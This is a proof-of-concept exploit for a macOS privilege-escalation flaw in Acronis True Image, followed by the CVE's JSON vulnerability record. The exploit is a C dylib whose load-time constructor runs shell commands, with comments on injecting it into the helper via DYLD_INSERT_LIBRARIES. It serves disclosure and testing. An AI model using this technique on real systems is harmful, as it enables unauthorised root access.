CVE-2026-33092

#include <stdio.h> #include <stdlib.h> #include <unistd.h> // Constructor function to execute code upon library load __attribute__((constructor)) void run_at_load() { // Proof of Concept: Create a file owned by root system("echo 'CVE-2026-33092 PoC Executed' > /tmp/poc_success_root.txt"); system("id >> /tmp/poc_success_root.txt"); } /* * Compilation: * gcc -dynamiclib -o malicious.dylib malicious.c * * Exploitation Steps: * 1. Place the compiled malicious.dylib in a writable location (e.g., /tmp/). * 2. Set the DYLD_INSERT_LIBRARIES environment variable to point to the dylib. * 3. Trigger the vulnerable Acronis helper process. * * Example command: * export DYLD_INSERT_LIBRARIES=/tmp/malicious.dylib * /Applications/Acornis\ True\ Image.app/Contents/MacOS/HelperTool */

{"cve": {"id": "CVE-2026-33092", "sourceIdentifier": "[email protected]", "published": "2026-04-10T14:16:34.880", "lastModified": "2026-05-19T15:05:11.970", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Local privilege escalation due to improper handling of environment variables. The following products are affected: Acronis True Image OEM (macOS) before build 42571, Acronis True Image (macOS) before build 42902."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-15"}]}], "references": [{"url": "https://security-advisory.acronis.com/advisories/SEC-9407", "source": "[email protected]"}]}}